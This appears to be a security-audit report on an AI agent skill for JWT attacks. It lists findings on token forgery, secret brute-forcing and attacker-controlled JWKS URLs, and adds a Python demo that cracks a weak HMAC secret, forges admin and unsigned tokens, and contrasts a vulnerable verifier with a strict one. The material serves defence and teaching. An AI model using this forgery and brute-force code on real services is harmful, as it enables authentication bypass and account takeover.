jwt-attack-methodology

Fail

Audited by Snyk on Apr 22, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 0.90). The prompt instructs extracting JWTs, brute-forcing or using recovered signing keys, and constructing/sending forged tokens (including embedding known/derived keys or token strings), which requires the agent to handle and potentially output secret token/credential values verbatim.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive playbook that teaches deliberate abuse (auth bypass, token forgery, secret exfiltration, SQL/path/command injection via kid, RS256→HS256 and jku/x5u attacks, brute-forcing HMAC secrets and RCE/SSTI vectors), and thus poses a high risk of malicious misuse.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill's required workflow (SKILL.md, AGENT.md, and references/jwt-advanced.md) explicitly instructs the agent to fetch and use public JWKS/JKU endpoints and arbitrary URLs (e.g., /.well-known/jwks.json, /api/jwks, and attacker-controlled jku/x5u URLs like http://attacker.com/jwks.json) and to treat that remote content as keys/inputs that determine token signing and verification, which exposes the agent to untrusted third-party content that can materially influence actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 0.90). The skill explicitly instructs runtime fetching of attacker-controlled JWKS (e.g., "http://attacker.com:8080/jwks.json") and shows code that requests and uses that remote JWKS to build keys and sign tokens, so the fetched URL content directly controls code execution and the agent's actions.
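The four findings above describe one family of verifier-side mistakes: letting the unauthenticated token header choose the algorithm (the RS256→HS256 confusion), honouring jku/x5u key locations supplied by the token, resolving kid against something the attacker can steer, and signing with an HMAC secret that can be guessed offline. The Python below is an added illustration for this page, not code from the audited skill or from Snyk. It builds HS256 tokens with the standard library, shows a header-trusting verifier accepting a forged token and an unsigned one, recovers a weak secret by dictionary attack, and contrasts a verifier that pins the algorithm, refuses remote or inline key material, and resolves kid only against a local allow-list. The secrets, claims, the wordlist and the http://attacker.example URL are constructed for the demo; nothing touches the network.

```python
# Added example for this page (not the audited skill's code). Secrets, claims,
# the wordlist and the attacker URL are constructed; stdlib only, fully offline.
import base64
import hashlib
import hmac
import json
from typing import Dict, List, Optional

HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def encode(header: dict, payload: dict, secret: Optional[bytes]) -> str:
    """Build a compact JWS. alg 'none' (or no secret) yields an unsigned token."""
    signing_input = ".".join(
        b64url(json.dumps(o, separators=(",", ":")).encode()) for o in (header, payload))
    if header.get("alg") == "none" or secret is None:
        return signing_input + "."
    sig = hmac.new(secret, signing_input.encode(), HMAC_ALGS[header["alg"]]).digest()
    return f"{signing_input}.{b64url(sig)}"

def vulnerable_verify(token: str, secret: bytes) -> Optional[dict]:
    """The unauthenticated header decides how the token is checked: the shape of
    every alg-confusion bug (RS256->HS256 included) and of alg 'none' bypasses."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":                      # BUG: unsigned tokens pass
        return json.loads(b64url_decode(p))
    digest = HMAC_ALGS[header["alg"]]                    # BUG: attacker picks the MAC
    expected = hmac.new(secret, f"{h}.{p}".encode(), digest).digest()
    if expected == b64url_decode(s):                     # BUG: timing-leaky compare
        return json.loads(b64url_decode(p))
    return None

def strict_verify(token: str, keys: Dict[str, bytes], expected_alg: str = "HS256") -> Optional[dict]:
    """Algorithm pinned by server config; keys only from a local allow-list (no
    jku/x5u/jwk/x5c, no filesystem or database lookup driven by kid)."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != expected_alg:
        return None
    if any(k in header for k in ("jku", "x5u", "jwk", "x5c")):
        return None
    key = keys.get(header.get("kid", "default"))
    if key is None:
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), HMAC_ALGS[expected_alg]).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))

def brute_force_hs256(token: str, wordlist: List[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: re-MAC the signing input with each candidate."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    for candidate in wordlist:
        mac = hmac.new(candidate, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None

def demo() -> dict:
    weak = b"secret123"                                             # constructed weak secret
    strong = hashlib.sha256(b"constructed 32-byte secret").digest()  # constructed strong secret
    wordlist = [b"password", b"jwt", b"secret123", b"changeme"]      # constructed wordlist
    hdr = {"alg": "HS256", "typ": "JWT"}
    user = {"sub": "alice", "admin": False}
    admin = {"sub": "alice", "admin": True}

    recovered = brute_force_hs256(encode(hdr, user, weak), wordlist)
    forged = encode(hdr, admin, recovered)                # re-signed with the recovered secret
    unsigned = encode({"alg": "none", "typ": "JWT"}, admin, None)
    remote_key = encode({**hdr, "jku": "http://attacker.example/jwks.json"}, admin, weak)

    return {
        "recovered_secret": recovered,
        "vuln_accepts_forged": vulnerable_verify(forged, weak) == admin,
        # Pinning the algorithm does not rescue a guessable key: still accepted.
        "strict_accepts_forged": strict_verify(forged, {"default": weak}) == admin,
        "vuln_accepts_unsigned": vulnerable_verify(unsigned, weak) == admin,
        "strict_rejects_unsigned": strict_verify(unsigned, {"default": weak}) is None,
        "strict_rejects_jku": strict_verify(remote_key, {"default": weak}) is None,
        "strong_secret_recovered": brute_force_hs256(encode(hdr, user, strong), wordlist),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The caveat worth noticing is in `strict_accepts_forged`: once the HMAC secret has been recovered offline, the pinned verifier accepts the forged admin token just as readily as the vulnerable one, because its signature is genuine. Algorithm pinning and refusing token-supplied key locations close the header-driven bypasses; only a secret of full entropy (the `strong` case, where the dictionary attack returns `None`) defeats the brute-force path.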

Issues (4)

W007  HIGH      Insecure credential handling detected in skill instructions.
E006  CRITICAL  Malicious code pattern detected in skill scripts.
W011  MEDIUM    Third-party content exposure detected (indirect prompt injection risk).
W012  MEDIUM    Unverifiable external dependency detected (runtime URL that controls agent).

Audit Metadata

Risk Level: CRITICAL
Analyzed: Apr 22, 2026, 07:58 AM
Issues: 4